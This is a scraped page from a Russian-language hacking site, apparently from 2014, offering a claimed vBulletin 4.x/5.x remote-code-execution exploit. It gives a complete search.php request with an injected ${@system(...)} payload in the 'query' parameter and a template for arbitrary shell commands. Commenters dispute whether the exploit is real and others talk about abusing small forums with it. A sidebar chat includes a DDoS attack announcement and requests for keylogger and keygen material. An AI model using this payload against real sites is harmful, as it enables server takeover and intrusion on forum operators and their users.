Интересное в сети

Мы Вконтакте

Посетители

Сейчас на сайте: 19
Пользователей: 0
Гостей: 17

Пользователи онлайн:

- отсутствуют

Гости (20 последних):

Гость-2,

Гость-3,

Гость-4,

Гость-5,

Гость-6,

Гость-7,

Гость-8,

Гость-9,

Гость-10,

Гость-11,

Гость-12,

Гость-13,

Гость-14,

Гость-15,

Гость-16,

Гость-17

Роботы:

Yandex,

Google

Статистика

Категории меню

Чат

Чтобы оставлять сообщения - зарегистрируйтесь

MAZAXAKER
31 дек 2024, 22:36

????????????С НОВЫМ ГОДОМ????????????
MAZAXAKER
22 ноя 2024, 12:04

Tortik брат ????
Baron.power
14 ноя 2024, 21:06

como se descargan los programas? siempre que le doy a descargar me sale la pagina de inicio... ayuda por favor
Shuma_xD
29 окт 2024, 11:14

Хочу быть мамкиным *****ом 10 лет спустя снова
Shuma_xD
29 окт 2024, 11:14

Живые есть?
MAZAXAKER
2 окт 2024, 15:28

ГДЕ СУГАК? ????
admin
27 авг 2024, 08:25

*HeaDekBaT, устарели.
HeaDekBaT
27 авг 2024, 07:37

Зашел на сайт спустя много лет) где все разделы кейлоггеры вирусы и прочее?) что случилось
tayfun221
18 авг 2024, 18:28

всем привет! шикарный сайт хоть я и на вашем языке чайник )))) но кое что полезное найти можно всегда кто бы научись писать хотя бы калькулятолр ))) как мне энто тяжело дается(((
sal0g0n
22 июн 2024, 15:03

капец
XaXaTyH
14 апр 2024, 05:07
admin
12 апр 2024, 14:26

*Ravin234,
Ravin234
7 апр 2024, 19:44

в 20:00 будет начнем DDoS атаку на сайт , по дополнительной информации писать на почту dzheyms.respektovich*gmail.com или телеграм *Ops0321
Macin
14 мар 2024, 19:48

Подписывайтесь на наш канал, здесь t.me мы собрали лучший софт. На нашем канале содержится только лучшие программы для компьютера и все, кто подпишутся, получат доступ к ним.
RUSLAN19860808
7 мар 2024, 02:56

Подскажите как лучше создать аккаунты в телеграмме штук 10 надо для тапалки
hecker
6 мар 2024, 21:41

походу ответа нет
hecker
5 мар 2024, 23:24

крипторы
hecker
5 мар 2024, 23:23

администраторы сайта happyhack.net добавте в меню
hecker
5 мар 2024, 23:22

не понял macin ты что несешь
Macin
5 мар 2024, 13:04

Приглашаем вас на наш Телеграмм канал с софт программами! Подписывайтесь сейчас, чтобы быть в курсе последних обновлений и новинок в мире программного обеспечения! ?????????
t.me
Steven0
2 фев 2024, 22:50

Does anyone have it?
Steven0
2 фев 2024, 22:50

I need Orgdata Logikal app with keygen.
Steven0
2 фев 2024, 22:50

Hello.
Mason
26 янв 2024, 08:35

Вайс салам, хотел забрать кое что) пзц все линки битые
tayfun221
30 дек 2023, 00:35

Не буду шить знакомого тел ,сказал там фото с армейки ,Вдруг вспомнит свой айди
tayfun221
30 дек 2023, 00:34

Завтра заберу под эксперименты 6 ,за 500 рублей битый изрядно и одно яблоко горит
tayfun221
30 дек 2023, 00:33

Взял у знакомого 5 s ,хотел попробовать фото вытащить , короче вытащить из sки точно что-то не возможно ,как из без префикса s
tayfun221
30 дек 2023, 00:30

Читать комментарии к последнему видео в Ютуб ,о плюсах и минусах чекрай
tayfun221
30 дек 2023, 00:19

youtube.com
tayfun221
30 дек 2023, 00:18

Закрыть Сохранить настройки Сохранить изменения Разбанить Удалить все

Вставить Отмена

Опрос на сайте

Как Вы нашли нас?

Уязвимость в форумах vBulletin

Автор: Kvak | Дата: 3-03-2014, 17:19 | Комментариев: 0 | Просмотров: 10 092

На топовый форумах конечно не работает, но на школофорумах вполне. Инфа была слита давно, но тут не было!
[Информация]
-Уязвимость продается тут: 1337 day
-Уязвимые версии: vBulletin v4.x.x and 5.х.x
-Цена на офф. сайте: 7000$ (~245000 рублей)
-Распространенность на 02.03.2014: 5/5
-Платформа: PHP
-Возможности: Shell Upload / Remote Code Execute

[Продаваемая уязвимость]

search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
# "query" param
# php code to inject : ${@system('put command here')}

ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP

Пароль на все архивы: hh

Теги: уязвимость vbulletin булка шелл

Категория: Пентест

Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

Написал: EL_BARTO
Дата: 3 марта 2014 17:25

Новостей: 6
Комментариев: 23

как заюзать

Написал: itz
Дата: 3 марта 2014 17:33

Новостей: 0
Комментариев: 39

Цитата: EL_BARTO

как заюзать

Не для средних умов.

Написал: OwNeR
Дата: 3 марта 2014 17:35

Новостей: 2
Комментариев: 118

Цитата: EL_BARTO

как заюзать

за4ем? все нормальные форумы уже закрыли давным давно все так называемые баги, а школо-форумы некому не нужны +

ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP

--------------------

Написал: Хохол
Дата: 3 марта 2014 17:57

Новостей: 0
Комментариев: 77

шток я тебя переплюну fuck

Написал: Niggapro
Дата: 3 марта 2014 18:12

Новостей: 0
Комментариев: 9

Цитата: Вентилятор Верблюдович

шток я тебя переплюну fuck

фак ю бич я видел же за тобой Отдел К приезжал.

Написал: Mason
Дата: 3 марта 2014 18:26

Новостей: 50
Комментариев: 523

Цитата: Niggapro

Цитата: Вентилятор Верблюдович

шток я тебя переплюну fuck

фак ю бич я видел же за тобой Отдел К приезжал.

ещё одна шкурятина красножопая,сколько вас тут?? определяйтесь как швея)))

--------------------

Нет неразрешимых проблем, есть неприятные решения.

Написал: devioo
Дата: 3 марта 2014 22:11

Новостей: 0
Комментариев: 1

7000$? Вы че упоролись? Там цена указана не в долларах а во внутрисайтовой валюте.

Написал: itz
Дата: 3 марта 2014 22:14

Новостей: 0
Комментариев: 39

Цитата: devioo

7000$? Вы че упоролись? Там цена указана не в долларах а во внутрисайтовой валюте.

1$ = 1 Gold

Написал: skog
Дата: 4 марта 2014 01:02

Новостей: 0
Комментариев: 7

fake
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcem
ents_aa/4007719-regarding-claims-of-new-0-day-exploits-in-vbulletin

http://hacksociety.net/Thread-Leak-vBulletin-v4-x-x-and-5-%D1%85-x-Shell-Upload-
Remote-Code-Execute-0day

Написал: putok1234
Дата: 4 марта 2014 01:46

Новостей: 0
Комментариев: 6

ахахахах блин былобы тут хоть чтобы стоющие =)

Написал: Wiser
Дата: 4 марта 2014 08:52

Новостей: 1
Комментариев: 27

уже пару месяцев как знаю эту уязв.

--------------------

Общий Аккаунт Apple НЕДОРОГО !!!

Написал: SyGaK
Дата: 4 марта 2014 13:08

Новостей: 113
Комментариев: 1 305

Цитата: putok1234

ахахахах блин былобы тут хоть чтобы стоющие =)

Ну тупой ты, че ещё сказать)

--------------------

ушел навсегда.

Написал: -=eXclass=-
Дата: 7 марта 2014 16:17

Новостей: 8
Комментариев: 106

Цитата: Wiser

уже пару месяцев как знаю эту уязв.

знать одно, а юзать другое.

// это фейк.

Написал: ooray
Дата: 8 марта 2014 16:36

Новостей: 0
Комментариев: 32

не приятная новость для меня smile-13

--------------------

www.igrosok.info

Написал: RSLab.su
Дата: 9 марта 2014 15:34

Новостей: 0
Комментариев: 6

Цитата: OwNeR

Цитата: EL_BARTO

как заюзать

ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP

Школофорумы это халявный траффик, дубовая ты башка. Не знаешь - не раззевай свой поганый пищеприёмник. Только с них с помощью этой дырочки можно не хило навариться.

--------------------

Го ко мне - userbot.ru

Написал: Iliusify
Дата: 10 марта 2014 16:50

Новостей: 0
Комментариев: 31

Эта RCE'шка уже как год переходит от одного форума к другому и в большинстве случаев, копипаст от одного автора. Новость не новая конечно, но лично находит подходящие форумы, на которых всё ещё работает, в основном 4.1.10

Написал: -=eXclass=-
Дата: 12 марта 2014 14:11

Новостей: 8
Комментариев: 106

Цитата: Iliusify

ти is_durak чтоли? lol

её нашли гдето 4 мес. назад всего то.

Написал: Iliusify
Дата: 15 марта 2014 14:39

Новостей: 0
Комментариев: 31

Цитата: -=eXclass=-

ти is_durak чтоли? lol

её нашли гдето 4 мес. назад всего то.

Её нашли в 2013 году и сразу же запостили на 337day. Дабы не вдаваться в подробности даты, ибо я думал, что это вряд-ли кого-то интересует, я округлил дату до года и думал, что на это никто не обратит внимания, ибо суть моего поста заключается в ином..

Уязвимость в форумах vBulletin

Добавление комментария